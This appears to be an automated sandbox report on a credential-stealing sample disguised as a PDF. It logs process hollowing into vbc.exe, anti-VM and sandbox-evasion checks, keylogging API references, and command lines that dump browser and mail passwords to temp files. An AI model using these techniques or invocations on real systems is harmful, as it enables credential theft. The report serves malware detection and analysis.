              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004121C3 LoadLibraryW,GetProcAddress,7_2_004121C3
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 0_2_0267881C push 5F5E5B6Bh; ret 0_2_026787E1
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_0151E672 push esp; ret 2_2_0151E679
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442871 push ecx; ret 7_2_00442881
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442A90 push eax; ret 7_2_00442AA4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442A90 push eax; ret 7_2_00442ACC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00446E54 push eax; ret 7_2_00446E61
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00411879 push ecx; ret 8_2_00411889
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004118A0 push eax; ret 8_2_004118B4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004118A0 push eax; ret 8_2_004118DC
              Source: initial sampleStatic PE information: section name: .text entropy: 7.64304839327

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Changes the view of files in windows explorer (hidden files and folders)Show sources
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
              Uses an obfuscated file name to hide its real file extension (double extension)Show sources
              Source: Possible double extension: pdf.exeStatic PE information: 5O857649056366403032021.PDF.exe
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00441975
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 3468, type: MEMORY
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.2804130.1.raw.unpack, type: UNPACKEDPE
              Opens the same file many times (likely Sandbox evasion)Show sources
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeFile opened: C:\Users\user\AppData\Local\Temp\holderwb.txt count: 306885Jump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 0_2_003448FF sldt word ptr [eax]0_2_003448FF
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe TID: 2168Thread sleep time: -100483s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe TID: 4228Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe TID: 4952Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe TID: 6540Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe TID: 6544Thread sleep time: -140000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe TID: 6928Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,7_2_00408441
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,7_2_00407E0E
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00406EC3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004161B0 memset,GetSystemInfo,7_2_004161B0
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004121C3 LoadLibraryW,GetProcAddress,7_2_004121C3
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              .NET source code references suspicious native API functionsShow sources
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess created: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe C:\Users\user\Desktop\5O857649056366403032021.PDF.exeJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.773337161.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.773337161.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.773337161.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.773337161.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
